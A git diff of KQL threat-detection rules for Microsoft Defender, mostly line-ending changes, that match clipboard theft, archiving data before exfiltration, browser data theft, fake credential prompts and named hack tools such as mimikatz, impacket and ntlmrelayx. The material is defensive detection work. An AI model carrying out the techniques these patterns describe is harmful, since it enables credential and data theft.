index 58ea181f..4d252f98 100644
--- a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
+++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
@@ -1,13 +1,13 @@
-// Title: Clipboard Collection with Xclip Tool
-// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-// Date: 2021-10-15
-// Level: low
-// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
-// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1115
-// False Positives:
-// - Legitimate usage of xclip tools.
-
-DeviceProcessEvents
+// Title: Clipboard Collection with Xclip Tool
+// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
+// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+// False Positives:
+// - Legitimate usage of xclip tools.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip"
\ No newline at end of file
diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
index 6a388610..d8070d43 100644
--- a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
+++ b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
@@ -1,12 +1,12 @@
-// Title: Clipboard Data Collection Via OSAScript
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-01-31
-// Level: high
-// Description: Detects possible collection of data from the clipboard via execution of the osascript binary
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Clipboard Data Collection Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible collection of data from the clipboard via execution of the osascript binary
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard"
\ No newline at end of file
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
index 7e685676..85a13b25 100644
--- a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
+++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
@@ -1,12 +1,12 @@
-// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
-// Author: frack113
-// Date: 2021-07-27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Legitimate activity is expected since compressing files with a password is common.
-
-DeviceProcessEvents
+// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate activity is expected since compressing files with a password is common.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
index e2d30117..12d2bac8 100644
--- a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
+++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
@@ -1,10 +1,10 @@
-// Title: Compress Data and Lock With Password for Exfiltration With WINZIP
-// Author: frack113
-// Date: 2021-07-27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-
-DeviceProcessEvents
+// Title: Compress Data and Lock With Password for Exfiltration With WINZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
index 0054ce84..dec61767 100644
--- a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
+++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
@@ -1,13 +1,13 @@
-// Title: Compressed File Creation Via Tar.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
-// Date: 2023-12-19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to create a compressed file.
-// Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-// False Positives:
-// - Likely
-
-DeviceProcessEvents
+// Title: Compressed File Creation Via Tar.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to create a compressed file.
+// Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
index 64801bdb..2ff126a0 100644
--- a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
+++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
@@ -1,13 +1,13 @@
-// Title: Compressed File Extraction Via Tar.EXE
-// Author: AdmU3
-// Date: 2023-12-19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to extract compressed file.
-// Adversaries may abuse various utilities in order to decompress data to avoid detection.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-// False Positives:
-// - Likely
-
-DeviceProcessEvents
+// Title: Compressed File Extraction Via Tar.EXE
+// Author: AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to extract compressed file.
+// Adversaries may abuse various utilities in order to decompress data to avoid detection.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql
index ef212c65..8cb84e79 100644
--- a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql
+++ b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql
@@ -1,10 +1,10 @@
-// Title: Data Copied To Clipboard Via Clip.EXE
-// Author: frack113
-// Date: 2021-07-27
-// Level: low
-// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1115
-
-DeviceProcessEvents
+// Title: Data Copied To Clipboard Via Clip.EXE
+// Author: frack113
+// Date: 2021-07-27
+// Level: low
+// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
 | where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/Collection/esentutl_steals_browser_information.kql
index e4a5393d..6e265852 100644
--- a/KQL/rules/Collection/esentutl_steals_browser_information.kql
+++ b/KQL/rules/Collection/esentutl_steals_browser_information.kql
@@ -1,12 +1,12 @@
-// Title: Esentutl Steals Browser Information
-// Author: frack113
-// Date: 2022-02-13
-// Level: medium
-// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1005
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Esentutl Steals Browser Information
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache"
\ No newline at end of file
diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
index 60d93348..2c0d4451 100644
--- a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
+++ b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
@@ -1,12 +1,12 @@
-// Title: Files Added To An Archive Using Rar.EXE
-// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
-// Date: 2019-10-21
-// Level: low
-// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Highly likely if rar is a default archiver in the monitored environment.
-
-DeviceProcessEvents
+// Title: Files Added To An Archive Using Rar.EXE
+// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Highly likely if rar is a default archiver in the monitored environment.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
index 2527fbd7..43dbbbac 100644
--- a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
+++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
@@ -1,11 +1,11 @@
-// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2021-07-20
-// Level: medium
-// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
-// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1074.001
-
-DeviceProcessEvents
+// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2021-07-20
+// Level: medium
+// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
+// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1074.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/Collection/gui_input_capture_macos.kql
index fad2568a..084037f2 100644
--- a/KQL/rules/Collection/gui_input_capture_macos.kql
+++ b/KQL/rules/Collection/gui_input_capture_macos.kql
@@ -1,12 +1,12 @@
-// Title: GUI Input Capture - macOS
-// Author: remotephone, oscd.community
-// Date: 2020-10-13
-// Level: low
-// Description: Detects attempts to use system dialog prompts to capture user credentials
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.credential-access, attack.t1056.002
-// False Positives:
-// - Legitimate administration tools and activities
-
-DeviceProcessEvents
+// Title: GUI Input Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use system dialog prompts to capture user credentials
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1056.002
+// False Positives:
+// - Legitimate administration tools and activities
+
+DeviceProcessEvents
 | where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock")
\ No newline at end of file
diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/Collection/hacktool_adcspwn_execution.kql
index 95eee526..48597c07 100644
--- a/KQL/rules/Collection/hacktool_adcspwn_execution.kql
+++ b/KQL/rules/Collection/hacktool_adcspwn_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - ADCSPwn Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-31
-// Level: high
-// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.credential-access, attack.t1557.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - ADCSPwn Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-31
+// Level: high
+// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql
index 6d70bb10..1bc4a784 100644
--- a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql
+++ b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Impacket Tools Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-24
-// Level: high
-// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
-// False Positives:
-// - Legitimate use of the impacket tools
-
-DeviceProcessEvents
+// Title: HackTool - Impacket Tools Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: high
+// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Legitimate use of the impacket tools
+
+DeviceProcessEvents
 | where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
index f7b1c794..626c2a50 100644
--- a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
+++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
@@ -1,13 +1,13 @@
-// Title: Periodic Backup For System Registry Hives Enabled
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-01
-// Level: medium
-// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
-// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113
-// False Positives:
-// - Legitimate need for RegBack feature by administrators.
-
-DeviceRegistryEvents
+// Title: Periodic Backup For System Registry Hives Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-01
+// Level: medium
+// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
+// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate need for RegBack feature by administrators.
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup"
\ No newline at end of file
diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql
index 2e442414..9a5eaee6 100644
--- a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql
+++ b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential SMB Relay Attack Tool Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-24
-// Level: critical
-// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
-// False Positives:
-// - Legitimate files with these rare hacktool names
-
-DeviceProcessEvents
+// Title: Potential SMB Relay Attack Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: critical
+// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Legitimate files with these rare hacktool names
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql
index 102b810c..13825854 100644
--- a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql
+++ b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious Activity Using SeCEdit
-// Author: Janantha Marasinghe
-// Date: 2022-11-18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-// False Positives:
-// - Legitimate administrative use
-
-DeviceProcessEvents
+// Title: Potential Suspicious Activity Using SeCEdit
+// Author: Janantha Marasinghe
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql
index 45d6cab7..ce241746 100644
--- a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql
+++ b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Get-Clipboard Cmdlet Via CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-05-02
-// Level: medium
-// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1115
-
-DeviceProcessEvents
+// Title: PowerShell Get-Clipboard Cmdlet Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql
index 0c3172f6..b9354612 100644
--- a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql
+++ b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql
@@ -1,10 +1,10 @@
-// Title: Processes Accessing the Microphone and Webcam
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-06-07
-// Level: medium
-// Description: Potential adversaries accessing the microphone and webcam in an endpoint.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1123
-
-DeviceRegistryEvents
+// Title: Processes Accessing the Microphone and Webcam
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-07
+// Level: medium
+// Description: Potential adversaries accessing the microphone and webcam in an endpoint.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged"
\ No newline at end of file
diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
index 78eedc5e..1a9de391 100644
--- a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
+++ b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
@@ -1,13 +1,13 @@
-// Title: Rar Usage with Password and Compression Level
-// Author: @ROxPinTeddy
-// Date: 2020-05-12
-// Level: high
-// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001
-// False Positives:
-// - Legitimate use of Winrar command line version
-// - Other command line tools, that use these flags
-
-DeviceProcessEvents
+// Title: Rar Usage with Password and Compression Level
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: high
+// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of Winrar command line version
+// - Other command line tools, that use these flags
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ")
\ No newline at end of file
diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
index 65fad7a0..632091d5 100644
--- a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
+++ b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
@@ -1,10 +1,10 @@
-// Title: Recon Information for Export with Command Prompt
-// Author: frack113
-// Date: 2021-07-30
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1119
-
-DeviceProcessEvents
+// Title: Recon Information for Export with Command Prompt
+// Author: frack113
+// Date: 2021-07-30
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119
+
+DeviceProcessEvents
